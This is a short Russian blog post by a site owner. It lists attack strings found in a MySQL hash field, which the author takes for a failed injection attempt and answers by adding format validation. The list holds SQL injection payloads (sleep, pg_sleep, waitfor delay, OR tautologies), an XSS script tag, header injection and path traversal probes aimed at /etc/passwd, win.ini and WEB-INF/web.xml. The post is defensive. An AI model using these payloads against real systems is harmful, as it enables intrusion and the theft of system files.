Запросы инъекции для mysql

В mysql вместо ожидаемого хэша (строка из 40 букво-цифр) нашёл следующие данные. Я так понимаю, кто то хотел выполнить mysql инъекцию. Далее будут примеры строк для mysql-инъекций, которыми хотели взломать сайт (домен не разглашаю). Хоть инъекция и не прошла, но всё же проверку строки на ожидаемый формат я добавил.

\n SomeCustomInjectedHeader:injected_by_w
\r\n SomeCustomInjectedHeader:injected_by_
\r SomeCustomInjectedHeader:injected_by_w
!(()&&!|*|*|
\'\"()&%<ScRiPt >prompt(983872)</ScRiPt>
(select convert(int,CHAR(65)))
(select(0)from(select(sleep(6)))v)/*\
)
-1 OR 2+361-361-1=0+0+0+1 --
1 OR 2+515-515-1=0+0+0+1
-1\" OR 2+213-213-1=0+0+0+1 --
-1\' OR 2+457-457-1=0+0+0+1 --
..
................windowswin.ini
../.../.././../.../.././../.../.././../.
../../../../../../../../../../boot.ini
../../../../../../../../../../etc/passwd
../..//../..//../..//../..//../..//../..
..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd
/../..//../..//../..//../..//../..//etc/
/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/w
/etc/passwd
/\\../\\../\\../\\../\\../\\../\\../etc/passwd
file:///etc/passwd
gbfQPiFG
http://some-inexistent-website.acu/some_
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jp
if(now()=sysdate(),sleep(3),0)/*\'XOR(if(
invalid../../../../../../../../../../etc
JyI=
kGWAsukP\');select pg_sleep(6); --
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
NY7WzQSZ\';select pg_sleep(6); --
testasp.vulnweb.com
unexisting/../../../../../../../../../..
Va8szuCr\')); waitfor delay \'0:0:6\' --
WEB-INF/web.xml
WEB-INF/web.xml?
WEB-INF\\web.xml
WEB-INF\\web.xml?
\\
^(#$!@#$)(()))******

 

 
 
 
 

icon Комментарии 0

Ваш комментарий к статье.. (для авторизованных)

ctrl+enter

icon Вход в систему

зарегистрироваться